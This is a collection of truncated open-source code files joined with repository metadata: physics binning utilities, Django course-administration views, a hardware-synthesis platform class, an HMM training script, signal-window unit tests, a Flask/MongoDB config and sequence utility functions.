                     energy_bins=energy_bins,
                     energy_midpoints=energy_midpoints,
                     energy_bin_widths=energy_bin_widths,
                     log_energy_min=log_energy_min,
                     log_energy_max=log_energy_max,
                     log_energy_bin_width=log_energy_bin_width,
                     log_energy_bins=log_energy_bins,
                     log_energy_midpoints=log_energy_midpoints)
def get_comp_bins(num_groups=2):
    """Function to return analysis composition bin information

    Parameters
    ----------
    num_groups : int, optional
        Number of composition groups (default is 2).

    Returns
    -------
    comp_bins : numpy.ndarray
        Array containing analysis composition bin edges.
    """
    # One integer edge per group boundary: 0, 1, ..., num_groups.
    return np.arange(num_groups + 1)
def get_zenith_bins(zenith_bin_width=10):
    """Function to return analysis zenith bin information

    Parameters
    ----------
    zenith_bin_width : int, optional
        Width of each zenith bin in degrees (default is 10).

    Returns
    -------
    zenithbins : namedtuple
        Namedtuple containing analysis zenith bin information
        (zenith_min, zenith_max, zenith_bins, zenith_midpoints,
        zenith_bin_widths).
    """
    # Create ZenithBin namedtuple
    zenith_field_names = ['zenith_min',
                          'zenith_max',
                          'zenith_bins',
                          'zenith_midpoints',
                          'zenith_bin_widths',
                          ]
    ZenithBin = namedtuple('ZenithBins', zenith_field_names)
    # Fixed zenith range for this analysis: 0 to 30 degrees.
    zenith_min = 0
    zenith_max = 30
    zenith_bins = np.arange(zenith_min,
                            zenith_max + zenith_bin_width,
                            zenith_bin_width)
    zenith_bin_widths = zenith_bins[1:] - zenith_bins[:-1]
    zenith_midpoints = (zenith_bins[1:] + zenith_bins[:-1]) / 2
    # Create instance of ZenithBin with appropriate binning
    zenithbins = ZenithBin(zenith_min=zenith_min,
                           zenith_max=zenith_max,
                           zenith_bins=zenith_bins,
                           zenith_midpoints=zenith_midpoints,
                           zenith_bin_widths=zenith_bin_widths)
    return zenithbins
def get_bins(config='IC86.2012', num_groups=2, zenith_bin_width=10,
             log_energy=True, include_zenith=False, return_columns=False):
    """Assemble the per-dimension bin edges used in the analysis.

    Returns energy and composition bins (optionally zenith bins too), and,
    when ``return_columns`` is True, also the matching DataFrame column names.
    """
    energybins = get_energybins(config=config)
    energy_bins = (energybins.log_energy_bins if log_energy
                   else energybins.energy_bins)
    bins = [energy_bins, get_comp_bins(num_groups=num_groups)]
    columns = ['reco_log_energy', 'pred_comp_target']
    if include_zenith:
        zenithbins = get_zenith_bins(zenith_bin_width=zenith_bin_width)
        bins.append(zenithbins.zenith_bins)
        columns.append('lap_zenith')
    return (bins, columns) if return_columns else bins
def bin_edges_to_midpoints(bin_edges):
    """Return the midpoint of each consecutive pair of bin edges."""
    return (bin_edges[1:] + bin_edges[:-1]) / 2
|
sostenibilidad-unam/posgrado
|
posgradmin/posgradmin/views_academico.py
|
Python
|
gpl-3.0
| 17,170
| 0.003554
|
# coding: utf-8
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.mixins import UserPassesTestMixin
from django.views.generic import ListView
from django.views import View
from django.db.models import Q
import posgradmin.models as models
from posgradmin import authorization as auth
from django.conf import settings
from django.shortcuts import render, HttpResponseRedirect
import posgradmin.forms as forms
from dal import autocomplete
from django.urls import reverse
from django.forms.models import model_to_dict
from pdfrw import PdfReader, PdfWriter, PageMerge
from django.template.loader import render_to_string
from sh import pandoc, mkdir
from tempfile import NamedTemporaryFile
import datetime
from django.utils.text import slugify
from .settings import BASE_DIR, MEDIA_ROOT, MEDIA_URL
class AcademicoAutocomplete(LoginRequiredMixin, UserPassesTestMixin, autocomplete.Select2QuerySetView):
    """Select2 autocomplete endpoint listing accredited academics."""
    login_url = settings.APP_PREFIX + 'accounts/login/'
    def test_func(self):
        # Only accredited academics (D/M/P/E or professor candidates) may query.
        if auth.is_academico(self.request.user):
            if self.request.user.academico.acreditacion in ['D', 'M', 'P', 'E',
                                                            'candidato profesor']:
                return True
        return False
    def get_queryset(self):
        # Restrict to accredited academics; self.q is the widget's search term
        # and narrows the result by first name (prefix) or last name (substring).
        qs = models.Academico.objects.filter(Q(acreditacion='candidato profesor')
                                             | Q(acreditacion='P')
                                             | Q(acreditacion='M')
                                             | Q(acreditacion='D')
                                             | Q(acreditacion='E'))
        if self.q:
            qs = qs.filter(Q(user__first_name__istartswith=self.q)
                           | Q(user__last_name__icontains=self.q))
        return qs
class ProponerAsignatura(LoginRequiredMixin, UserPassesTestMixin, View):
    """Let an accredited academic propose a new optional asignatura."""
    login_url = settings.APP_PREFIX + 'accounts/login/'
    template = 'posgradmin/proponer_asignatura.html'
    form_class = forms.AsignaturaModelForm

    def test_func(self):
        # Only accredited academics (or professor candidates) may propose.
        if auth.is_academico(self.request.user):
            if self.request.user.academico.acreditacion in ['D', 'M', 'P',
                                                            'candidato profesor']:
                return True
        return False

    def _render_form(self, request, form):
        # Shared renderer for the initial GET and for a failed POST.
        breadcrumbs = ((settings.APP_PREFIX + 'inicio/', 'Inicio'),
                       ('', 'Proponer Asignatura')
                       )
        return render(request,
                      self.template,
                      {
                          'title': 'Proponer Asignatura',
                          'breadcrumbs': breadcrumbs,
                          'form': form
                      })

    def get(self, request, *args, **kwargs):
        form = self.form_class(initial={'academicos': [request.user.academico, ]})
        return self._render_form(request, form)

    def post(self, request, *args, **kwargs):
        form = self.form_class(request.POST, request.FILES)
        if form.is_valid():
            a = models.Asignatura(
                asignatura=request.POST['asignatura'],
                tipo='Optativa',
                estado='propuesta',
                programa=request.FILES['programa'])
            a.save()
            return HttpResponseRedirect(reverse('inicio'))
        # BUG FIX: the original printed form.errors and returned None, which
        # makes Django raise a 500; re-render so validation errors are shown.
        return self._render_form(request, form)
class SolicitaCurso(LoginRequiredMixin, UserPassesTestMixin, View):
    """Request a course for an asignatura within an open convocatoria."""
    login_url = settings.APP_PREFIX + 'accounts/login/'
    template = 'posgradmin/solicita_curso.html'
    form_class = forms.CursoModelForm

    def test_func(self):
        # Only accredited academics (or professor candidates) may request.
        if auth.is_academico(self.request.user):
            if self.request.user.academico.acreditacion in ['D', 'M', 'P', 'E',
                                                            'candidato profesor']:
                return True
        return False

    def get(self, request, *args, **kwargs):
        convocatoria = models.ConvocatoriaCurso.objects.get(pk=int(kwargs['pk']))
        # A closed convocatoria no longer accepts requests.
        if convocatoria.status == 'cerrada':
            return HttpResponseRedirect(reverse('mis_cursos'))
        asignatura = models.Asignatura.objects.get(pk=int(kwargs['as_id']))
        form = self.form_class(initial={'academicos': [request.user.academico, ]})
        breadcrumbs = ((settings.APP_PREFIX + 'inicio/', 'Inicio'),
                       (reverse('elige_asignatura', args=[convocatoria.id, ]),
                        "Convocatoria para cursos %s-%s" % (convocatoria.year,
                                                            convocatoria.semestre)))
        return render(request,
                      self.template,
                      {'title': 'Solicitar curso',
                       'breadcrumbs': breadcrumbs,
                       'convocatoria': convocatoria,
                       'asignatura': asignatura,
                       'form': form})

    def post(self, request, *args, **kwargs):
        convocatoria = models.ConvocatoriaCurso.objects.get(pk=int(kwargs['pk']))
        if convocatoria.status == 'cerrada':
            return HttpResponseRedirect(reverse('mis_cursos'))
        asignatura = models.Asignatura.objects.get(pk=int(kwargs['as_id']))
        form = self.form_class(request.POST)
        if form.is_valid():
            curso = models.Curso(
                convocatoria=convocatoria,
                asignatura=asignatura,
                year=convocatoria.year,
                semestre=convocatoria.semestre,
                sede=request.POST['sede'],
                aula=request.POST['aula'],
                horario=request.POST['horario'])
            curso.save()
            # Attach the selected co-teachers plus the requesting academic.
            for ac_id in request.POST.getlist('academicos'):
                academico = models.Academico.objects.get(pk=int(ac_id))
                curso.academicos.add(academico)
            curso.academicos.add(request.user.academico)
            curso.save()
        return HttpResponseRedirect(reverse('mis_cursos'))
class CursoView(LoginRequiredMixin, UserPassesTestMixin, View):
    """Edit an existing course request; only its own academics may access it."""
    login_url = settings.APP_PREFIX + 'accounts/login/'
    template = 'posgradmin/solicita_curso.html'
    form_class = forms.CursoModelForm
    def test_func(self):
        # Accredited academics may edit, but only courses they belong to.
        curso = models.Curso.objects.get(pk=int(self.kwargs['pk']))
        if auth.is_academico(self.request.user):
            if self.request.user.academico.acreditacion in ['D', 'M', 'P', 'E',
                                                            'candidato profesor']:
                if self.request.user.academico in curso.academicos.all():
                    return True
        return False
    def get(self, request, *args, **kwargs):
        curso = models.Curso.objects.get(pk=int(kwargs['pk']))
        # Pre-fill the form with the course's current field values.
        form = self.form_class(initial=model_to_dict(curso))
        breadcrumbs = ((reverse('inicio'), 'Inicio'),
                       (reverse('mis_cursos'), "Mis cursos"))
        return render(request,
                      self.template,
                      {
                          'title': 'Editar curso',
                          'breadcrumbs': breadcrumbs,
                          'convocatoria': curso.convocatoria,
                          'asignatura': curso.asignatura,
                          'form': form
                      })
    def post(self, request, *args, **kwargs):
        curso = models.Curso.objects.get(pk=int(kwargs['pk']))
        convocatoria = curso.convocatoria
        # Editing is disallowed once the convocatoria has closed.
        if convocatoria.status == 'cerrada':
            return HttpResponseRedirect(reverse('mis_cursos'))
        asignatura = curso.asignatura
        form = self.form_class(request.POST)
        if form.is_valid():
            curso.sede = request.POST['sede']
            curso.aula = request.POST['aula']
            curso.horario = request.POST['horario']
            curso.save()
            # Replace the whole academics set with the submitted selection.
            curso.academicos.clear()
            for ac_id in request.POST.getlist('academicos'):
                ac = models.Academico.objects.get(pk=int(ac_id))
                curso.academicos.add(ac)
            curso.save()
        return HttpResponseRedirect(reverse('mis_cursos'))
class CursoConstancia(LoginRequiredMixin, Use
|
Nic30/HWToolkit
|
hwt/synthesizer/dummyPlatform.py
|
Python
|
mit
| 775
| 0.002581
|
from hwt.synthesizer.rtlLevel.extract_part_drivers import extract_part_drivers
from hwt.synthesizer.rtlLevel.remove_unconnected_signals import removeUnconnectedSignals
from hwt.synthesizer.rtlLevel.mark_visibility_of_signals_and_check_drivers import markVisibilityOfSignalsAndCheckDrivers
class DummyPlatform():
    """
    :note: all processors has to be callable with only one parameter
        which is actual Unit/RtlNetlist instance
    """

    def __init__(self):
        # Processor hooks grouped by translation phase; each list holds
        # callables taking the Unit/RtlNetlist instance being translated.
        self.beforeToRtl = []
        self.beforeToRtlImpl = []
        self.afterToRtlImpl = []
        # Default netlist clean-up passes run before HDL architecture
        # generation, in this order.
        self.beforeHdlArchGeneration = [
            extract_part_drivers,
            removeUnconnectedSignals,
            markVisibilityOfSignalsAndCheckDrivers,
        ]
        self.afterToRtl = []
|
eranroz/dnase
|
src/scripts/HMMTrainRegions.py
|
Python
|
mit
| 2,526
| 0.002771
|
"""
This script trains a model based on different regions of chromosome 1,
and evaluates the model as the likelihood of it for the whole chromosome 2.
Useful to know whether it is sufficient to train only based on smaller data
"""
import os
import numpy as np
from config import RES_DIR
from data_provider import SeqLoader
from data_provider.DiscreteTransformer import DiscreteTransformer
from hmm import bwiter
from hmm.HMMModel import DiscreteHMM
__author__ = 'eranroz'
MODEL_EVALUATION_RESULTS = os.path.join(RES_DIR, 'modelEvaluation')
resolution = 100  # bin size used when loading the accessibility signal
iterations = 7  # Baum-Welch iterations per trained region

# Discretized training data: chromosome 1 is used for training, chromosome 2
# for evaluating the trained model's likelihood.
training = SeqLoader.load_dict('UW.Fetal_Brain.ChromatinAccessibility.H-22510.DS11872', resolution,
                               DiscreteTransformer())
chromosomeLength = len(training['chr1'])

# BUG FIX: the results file is now closed even if training raises.
with open(os.path.join(MODEL_EVALUATION_RESULTS,
                       'trainRegions.10n100.%s.txt' % str(resolution)), 'w') as res_file:
    for regionSize in [10, 100]:
        res_file.write('region sizes %s' % (str(regionSize)))
        res_matrix = np.zeros(regionSize)
        max_p = -999999999
        max_region = None
        # BUG FIX: the original used ``chromosomeLength / regionSize`` which is
        # a float under Python 3 and is invalid as a slice index; use integer
        # division with an explicit region index instead.
        region_len = chromosomeLength // regionSize
        for itera in range(regionSize):
            start = itera * region_len
            region = training['chr1'][start: start + region_len]
            # Initial guess: begin/open/closed chain with sticky states.
            state_transition = np.array(
                [
                    [0.0, 0.99, 0.01],  # begin
                    [0.3, 0.9, 0.1],  # open (may go to close but prefers to keep the state)
                    [0.7, 0.1, 0.9]  # closed (very small change to get to open)
                ]
            )
            emission = np.array([
                np.zeros(4),
                [0.02, 0.4, 0.5, 0.08],  # open - prefers high values
                [0.8, 0.1, 0.09, 0.01],  # closed - prefers low values
            ])
            model = DiscreteHMM(state_transition, emission)
            res_file.write('-------------------')
            # BUG FIX: the region end was reported with a hard-coded ``/ 10``
            # even when regionSize is 100; use the actual region length.
            res_file.write('Trained on region: %s - %s' % (str(start), str(start + region_len)))
            new_model, p = bwiter.bw_iter(region, model, iterations)
            #res_file.write(str(new_model))
            bw_output = new_model.forward_backward(training['chr2'])
            res_file.write('Likelihood (chr2): %s' % str(bw_output.model_p))
            res_matrix[itera] = bw_output.model_p
            if bw_output.model_p > max_p:
                max_p = bw_output.model_p
                max_region = str(start)
        print('likelihood as function of region in chromosome 1')
        print(str(res_matrix))
        print('Max region: %s' % max_region)
        print('Max P: %s' % max_p)
print('Finished')
|
cokelaer/spectrum
|
test/test_window.py
|
Python
|
bsd-3-clause
| 9,764
| 0.013212
|
from spectrum import *
from numpy.testing import assert_almost_equal
import pytest
def test_class_Window():
    """Exercise the Window class API and its rejection of unknown names."""
    w = Window(65, name='hann')
    # property / plotting smoke checks
    w.enbw
    w.mean_square
    w.frequencies
    w.plot_time_freq()
    w.compute_response(NFFT=32)
    # Fixed: the original `try: ...; assert False; except: assert True`
    # could never fail, because the bare except also swallowed the
    # AssertionError raised by `assert False`.
    try:
        Window(64, name='wrong')
    except Exception:
        pass
    else:
        raise AssertionError("Window should reject the unknown name 'wrong'")
    w.info()
    print(w)
    # recompute response
    w = Window(65, name='hann')
    w.response
    w.plot_frequencies(maxdB=120, mindB=-100)
    try:
        Window(65, name="dummy")
    except Exception:
        pass
    else:
        raise AssertionError("Window should reject the unknown name 'dummy'")
#unittest of create_window
def test_create_window_error():
    """create_window must reject an unknown window name."""
    # Fixed: the original `try: ...; assert False; except: assert True`
    # pattern always passed -- the bare except swallowed the AssertionError.
    try:
        create_window('dummy')
    except Exception:
        pass
    else:
        raise AssertionError("create_window should reject the unknown name 'dummy'")
#test that create_window(N, name) works for all valid names
# Fixed: the parametrize decorator was split mid-string by an extraction
# artifact, leaving an unterminated string literal.
@pytest.mark.parametrize('test_window_name,length',
                         [(name, size) for name, size in zip(window_names.keys(), [1, 51, 52])])
def test_create_window(test_window_name, length):
    """Building each parametrized (name, size) pair must not raise."""
    # NOTE(review): zip() truncates to the 3 listed sizes, so only the first
    # three window names are exercised despite the "all valid names" comment
    # above -- confirm whether itertools.product was intended.
    create_window(length, name=test_window_name)
#test that create_window(N, name) is indeed equivalent to the direct call window_name
@pytest.mark.parametrize("name,param",
                         [('blackman', {'alpha': 2}),
                          ('kaiser', {'beta': 8.6}),
                          ('gaussian', {'alpha': 2.5}),
                          ('chebwin', {'attenuation': 50}),
                          ('flattop', {'mode': 'symmetric'}),
                          ('tukey', {'r': 0.5}),
                          ('poisson', {'alpha': 2}),
                          ('poisson_hanning', {'alpha': 2}),
                          ('cauchy', {'alpha': 3})])
def test_check_window_switch(name, param):
    """create_window(N, name, ...) must match the direct window_<name> call."""
    direct = eval('window_' + name)(64, **param)
    dispatched = create_window(64, name, **param)
    assert all(a == b for a, b in zip(direct, dispatched))
def test_create_window_others():
    """Unknown keyword arguments must raise ValueError."""
    # hamming accepts no extra keyword arguments
    try:
        create_window(11, "hamming", dummy=1)
    except ValueError:
        pass
    else:
        raise AssertionError("unexpected keyword 'dummy' should raise ValueError")
    # Fixed: the valid beta=0.5 call was previously *inside* the try block,
    # so a spurious ValueError from it would have let the test pass without
    # ever checking the bad 'dummy' keyword.
    create_window(11, "kaiser", beta=0.5)  # valid usage: must not raise
    try:
        create_window(11, "kaiser", dummy=1)
    except ValueError:
        pass
    else:
        raise AssertionError("unexpected keyword 'dummy' should raise ValueError")
def test_bartlett():
    """unit and functional test window_bartlett"""
    assert_almost_equal(
        window_bartlett(7),
        array([0., 0.33333333, 0.66666667, 1., 0.66666667, 0.33333333, 0.]))
    assert_almost_equal(
        window_bartlett(8),
        array([0., 0.28571429, 0.57142857, 0.85714286,
               0.85714286, 0.57142857, 0.28571429, 0.]))
def test_kaiser():
    """unit and functional test window_kaiser"""
    assert_almost_equal(
        window_kaiser(8),
        array([0.00133251, 0.09113651, 0.45964377, 0.92046158,
               0.92046158, 0.45964377, 0.09113651, 0.00133251]))
    assert_almost_equal(
        window_kaiser(7),
        array([0.00133251, 0.13040195, 0.63041193, 1.,
               0.63041193, 0.13040195, 0.00133251]))
    # alternative computation back-ends: smoke-tested only
    window_kaiser(8, method='other')
    window_kaiser(8, method='numpy')
    assert window_kaiser(1, method='numpy') == np.array([1])
def test_blackman():
    """unit and functional test window_blackman"""
    vec8 = array([-1.38777878e-17, 9.04534244e-02, 4.59182958e-01, 9.20363618e-01,
                  9.20363618e-01, 4.59182958e-01, 9.04534244e-02, -1.38777878e-17])
    vec7 = array([-1.38777878e-17, 1.30000000e-01, 6.30000000e-01, 1.00000000e+00,
                  6.30000000e-01, 1.30000000e-01, -1.38777878e-17])
    assert_almost_equal(window_blackman(8), vec8)
    assert_almost_equal(window_blackman(7), vec7)
    # passing alpha=0.16 explicitly must reproduce the same reference vector
    assert_almost_equal(window_blackman(7, alpha=0.16), vec7)
    assert window_blackman(1, alpha=0.16) == np.array([1])
def test_hann():
    """unit and functional test window_hann"""
    assert_almost_equal(window_hann(7), array([0., 0.25, 0.75, 1., 0.75, 0.25, 0.]))
    assert_almost_equal(
        window_hann(8),
        array([0., 0.1882551, 0.61126047, 0.95048443,
               0.95048443, 0.61126047, 0.1882551, 0.]))
def test_hammming():
    """unit and functional test window_hamming (misspelled test name kept
    unchanged so the collected test id stays stable)"""
    assert_almost_equal(
        window_hamming(8),
        array([0.08, 0.25319469, 0.64235963, 0.95444568,
               0.95444568, 0.64235963, 0.25319469, 0.08]))
    assert_almost_equal(
        window_hamming(7),
        array([0.08, 0.31, 0.77, 1., 0.77, 0.31, 0.08]))
def test_chebwin():
    """unit and functional test window_chebwin"""
    # NOTE(review): this function name is redefined later in the file, so
    # pytest only collects the later definition; consider removing one copy.
    vec7 = array([0.1116911, 0.41962999, 0.81377359, 1., 0.81377359, 0.41962999, 0.1116911])
    vec8 = array([0.09455132, 0.34937508, 0.71822375, 1., 1., 0.71822375, 0.34937508, 0.09455132])
    # Fixed: the original called the misspelled, nonexistent 'window_checbwin'.
    for x, y in zip(window_chebwin(8), vec8):
        assert_almost_equal(x, y)
    for x, y in zip(window_chebwin(7), vec7):
        assert_almost_equal(x, y)
def test_gaussian():
    """unit and functional test window_gaussian"""
    assert_almost_equal(
        window_gaussian(8),
        array([0.09139376, 0.29502266, 0.64438872, 0.9523448,
               0.9523448, 0.64438872, 0.29502266, 0.09139376]))
    assert_almost_equal(
        window_gaussian(7),
        array([0.1006689, 0.36044779, 0.77483743, 1.,
               0.77483743, 0.36044779, 0.1006689]))
def test_cauchy():
    # smoke test: must run without raising (no reference vector available)
    window_cauchy(64)

def test_cosine():
    window_cosine(64)
    # a length-1 window degenerates to a single unit sample
    assert window_cosine(1) == np.array([1.])

def test_riemann():
    # smoke test only
    window_riemann(64)

def test_lanczos():
    window_lanczos(64)
    # length-1 degenerate case
    assert window_lanczos(1) == np.array([1.])

def test_poisson():
    # smoke test only; the length-1 check below is deliberately disabled
    window_poisson(64)
    #assert window_poisson(1) == np.array([1.])

def test_poisson_hanning():
    # smoke test only
    window_poisson_hanning(64)
def test_bartlett_hann():
    """unit and functional test window_bartlett_hann"""
    assert_almost_equal(
        window_bartlett_hann(7),
        array([0., 0.27, 0.73, 1., 0.73, 0.27, 0.]))
    assert_almost_equal(
        window_bartlett_hann(8),
        array([0., 0.2116453, 0.60170081, 0.92808246,
               0.92808246, 0.60170081, 0.2116453, 0.]))
    assert window_bartlett_hann(1) == np.array([1.])
def test_window_visu():
    # smoke test: the plotting helper must run without raising
    window_visu(64, 'hamming')

def test_enbw():
    # the rectangular window's equivalent noise bandwidth is exactly 1
    N = 64
    w = create_window(N, 'rectangle')
    assert enbw(w) == 1.
def test_window_parzen():
    """unit and functional test window_parzen"""
    assert_almost_equal(
        window_parzen(8),
        array([0.00390625, 0.10546875, 0.47265625, 0.91796875,
               0.91796875, 0.47265625, 0.10546875, 0.00390625]))
    assert_almost_equal(
        window_parzen(7),
        array([0.0058309, 0.1574344, 0.65014577, 1.,
               0.65014577, 0.1574344, 0.0058309]))
def test_bohman():
    """unit and functional test window_bohman"""
    assert_almost_equal(
        window_bohman(8),
        array([3.89804309e-17, 7.07247468e-02, 4.37484012e-01, 9.10368513e-01,
               9.10368513e-01, 4.37484012e-01, 7.07247468e-02, 3.89804309e-17]))
    assert_almost_equal(
        window_bohman(7),
        array([3.89804309e-17, 1.08997781e-01, 6.08997781e-01, 1.00000000e+00,
               6.08997781e-01, 1.08997781e-01, 3.89804309e-17]))
# NOTE(review): this redefines test_chebwin from earlier in the file; pytest
# collects only this later definition.
def test_chebwin():
    # reference vectors for the Dolph-Chebyshev window at default attenuation
    vec8 = array([0.09455132, 0.34937508, 0.71822375, 1., 1., 0.71822375, 0.34937508, 0.09455132])
    vec7 = array([0.1116911, 0.41962999, 0.81377359, 1., 0.81377359, 0.41962999, 0.1116911])
    for x, y in zip(window_chebwin(8), vec8):
        assert_almost_equal(x, y)
    for x, y in zip(window_chebwin(7), vec7):
        assert_almost_equal(x, y)

def test_nuttall():
    # smoke test plus the length-1 degenerate case
    window_nuttall(64)
    assert window_nuttall(1) == np.array([1.])
def test_blackman_nuttall():
vec7 = array([ 3.62800000e-04, 6.13345000e-02, 5.29229800e-01, 1.00000000e+00, 5.29229800e-01, 6.13345000e-02, 3.62800000e-04])
vec8 = array([ 3.62800000e-04, 3.77757690e-02, 3.42727620e-01, 8.91851861e-01, 8.91851861e-01, 3.42727620e-01, 3.77757690e-02, 3.62800000e-04])
|
hkhamm/proj5-mongo
|
CONFIG.py
|
Python
|
artistic-2.0
| 563
| 0.003552
|
"""
Configuration of 'memos' Flask app.
Edit to fit development or deployment environment.
"""
# import random
# localhost
# PORT = 5000
# DEBUG = True
# MONGO_PORT =
|
27017
# ix.cs.uoregon.edu
PORT = 7420 # random.randint(5000, 8000)
MONGO_PORT = 4152
DEBUG = False # Because it's unsafe to run outside localhost
# both
MONGO_URL = "mongodb://memos_user:peach-cobbler@localhost:4152/memos"
# MONGO_USER = 'memos_user'
# MONGO_PW = 'peach-cobbler'
# MONGO_DB = 'memos'
# MONGO_URL =
|
'mongodb://{$MONGO_USER}:{$MONGO_PW}@localhost:{$MONGO_PORT}/{$MONGO_DB}'
|
phac-nml/neptune
|
neptune/Utility.py
|
Python
|
apache-2.0
| 7,808
| 0.001281
|
#!/usr/bin/env python
"""
# =============================================================================
Copyright Government of Canada 2015-2017
Written by: Eric Marinier, Public Health Agency of Canada,
National Microbiology Laboratory
Funded by the National Micriobiology Laboratory and the Genome Canada / Alberta
Innovates Bio Solutions project "Listeria Detection and Surveillance
using Next Generation Genomics"
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License. You may obtain a copy of the
License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
# =============================================================================
"""
"""
# =============================================================================
This script provides shared utility to other scripts.
# =============================================================================
"""
import math
import os
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
AGGREGATE_OTHER = "__OTHER__"
"""
# =============================================================================
GET AGGREGATION TAGS
--------------------
PURPOSE
-------
Produces a list of aggregation tags associated with the specified degree of
organization.
INPUT
-----
[INT >= 0] [parallelization]
The degree of parallelization.
RETURN
------
[STRING ITERABLE] [tags]
An iterable object of sequence tags.
There will be (4^[organization]) tags produced and an "AGGREGATE_OTHER"
tag.
These tags will contain A, C, G, and T, and arranged in lexicographic
order with the "AGGREGATE_OTHER" tag at the very end.
# =============================================================================
"""
def getAggregationTags(parallelization):
    """Return the 4**parallelization fixed-length sequence tags plus AGGREGATE_OTHER.

    Tags are in lexicographic order (A < C < G < T) with the catch-all
    AGGREGATE_OTHER tag appended last. Raises RuntimeError if
    parallelization is negative.
    """
    if parallelization < 0:
        raise RuntimeError("The degree of parallelization is out of range.")
    # Integer exponentiation avoids the float round-trip of math.pow, which
    # can misround once 4**parallelization exceeds 2**53.
    instances = 4 ** parallelization
    tags = [generateSequence(i, parallelization) for i in range(instances)]
    tags.append(AGGREGATE_OTHER)
    return tags
"""
# =============================================================================
GENERATE SEQUENCE
-----------------
PURPOSE
-------
Generates and returns a nucleotide sequence of a specified length from a passed
integer value.
INPUT
-----
[INT >= 0] [integer]
The integer to convert to sequence.
[INT >= 0] [length]
The length of the sequence to return.
RETURN
------
[STRING] [sequence]
A sequence of length [length] generated from the [integer].
Sequences are genrated such that, for all 0 <= x < 4^[length]:
generateSequence(x, [length]) < generateSequence(x+1, [length])
when evaluated lexicographically.
# =============================================================================
"""
def generateSequence(integer, length):
    """Return the length-`length` nucleotide string encoding `integer` in base 4.

    Digits map 0->A, 1->C, 2->G, 3->T, most significant digit first, so
    results at a fixed length sort lexicographically by `integer`.
    Raises RuntimeError when either argument is negative.
    """
    if integer < 0:
        raise RuntimeError("The sequence integer is out of range.")
    if length < 0:
        raise RuntimeError("The sequence length is out of range.")
    bases = "ACGT"
    current = integer
    sequence = ""
    for _ in range(length):
        # prepend the next base-4 digit (least significant digit last)
        sequence = bases[current % 4] + sequence
        # Fixed: must be floor division. On Python 3 the original
        # `current = current / 4` made `current` a float, so `current % 4`
        # stopped producing integer digits and the sequence came out wrong.
        current //= 4
    return sequence
"""
# =============================================================================
REVERSE COMPLEMENT
------------------
PURPOSE
-------
Produces and returns the reverse complement of the sequence.
INPUT
-----
[STRING] [sequence]
The sequence to reverse complement.
RETURN
------
[STRING] [reverse
|
]
The reverse complement of the passed sequence.
# =============================================================================
"""
def reverseComplement(sequence):
    # Delegates to Biopython's Seq.reverse_complement for the actual work.
    reverse = str(Seq(sequence, generic_dna).reverse_complement())
    return reverse
"""
# =========
|
====================================================================
BUILD REFERENCES
----------------
PURPOSE
-------
Builds string references (contig pieces) from the reference file.
INPUT
-----
[FILE] [referenceFile]
The file from which to build the string reference.
RETURN
------
[STRING ITERABLE] [references]
A list of string references where contigs comprise the different items
in the iterable object.
# =============================================================================
"""
def buildReferences(referenceFile):
    """Build a {name: sequence} dict from a FASTA-style reference file.

    The reference name is the first whitespace-delimited token after '>'.
    Sequence lines are stripped and upper-cased; multi-line sequences are
    concatenated. Raises RuntimeError if sequence data appears before the
    first header line.
    """
    references = {}
    referenceName = None
    for line in referenceFile:
        if line.startswith(">"):
            # new reference: take the first token of the header as its name
            tokens = (line[1:]).split()
            referenceName = tokens[0]
            references[referenceName] = ""
        else:
            # Fixed: previously a sequence line before any header raised an
            # opaque NameError; fail with a clear message instead.
            if referenceName is None:
                raise RuntimeError(
                    "Reference input contains sequence data before the first "
                    "'>' header line.")
            references[referenceName] += line.strip().upper()
    return references
"""
# =============================================================================
ESTIMATE REFERENCE PARAMETERS
PURPOSE:
Estimates the size of the reference and GC-content from one or more
reference fragments.
INPUT:
[STRING ITERABLE] [references] - A list of string references.
RETURN:
[TUPLE: INT, FLOAT] [size, gcContent] - An estimate for the reference size
and GC-content.
# =============================================================================
"""
def estimateReferenceParameters(references):
    """Estimate total reference size and GC-content from reference fragments.

    references -- {name: sequence} dict of reference strings.
    Returns (size, gcContent) where size includes all characters (ambiguity
    codes too) and gcContent = GC / (GC + AT) over unambiguous bases only.
    Raises RuntimeError when `references` is empty or a reference contains
    no A, C, G, or T characters.
    """
    if references is None or len(references) < 1:
        raise RuntimeError("There are no references.")
    sumGC = 0
    sumAT = 0
    size = 0
    for reference in references:
        seq = references[reference]
        gc = seq.count('G') + seq.count('C')
        at = seq.count('A') + seq.count('T')
        # Fixed: check each reference's own counts, matching the
        # per-reference error message (the cumulative totals could hide an
        # all-ambiguous reference that followed a valid one).
        if gc + at == 0:
            raise RuntimeError(
                "There are no A, C, G, or T characters in reference: " +
                str(reference) + "\n")
        sumGC += gc
        sumAT += at
        size += len(seq)
    gcContent = float(sumGC) / float(sumGC + sumAT)
    return size, gcContent
"""
# =========================================================================
EXPAND INPUT
PURPOSE:
Expands the file input locations to include all files within all
directories.
The directories are not included in the final list. However, all
non-directories located within the directories are included as
individual files.
INPUT:
[(FILE LOCATION) LIST] [inputLocations] - The file input locations.
[(FILE LOCATION) LIST] [result] - The list to fill with the expanded
input entries.
RETURN:
[NONE]
POST:
The passed [result] parameter will contain the expanded input.
# =========================================================================
"""
def expandInput(inputLocations, result):
    """Expand input locations in place: directories become their contained files.

    Directories themselves are not kept; only regular files found directly
    inside them are. Every entry in `result` is finally converted to an
    absolute path. `result` is mutated; nothing is returned.
    """
    for location in inputLocations:
        if os.path.isdir(location):
            # keep only the regular files directly inside the directory
            result.extend(
                os.path.join(location, entry)
                for entry in os.listdir(location)
                if os.path.isfile(os.path.join(location, entry)))
        else:
            result.append(location)
    # normalize everything (including pre-existing entries) in place
    result[:] = [os.path.abspath(path) for path in result]
|
googleapis/python-aiplatform
|
samples/generated_samples/aiplatform_v1_generated_model_service_get_model_evaluation_async.py
|
Python
|
apache-2.0
| 1,506
| 0.000664
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
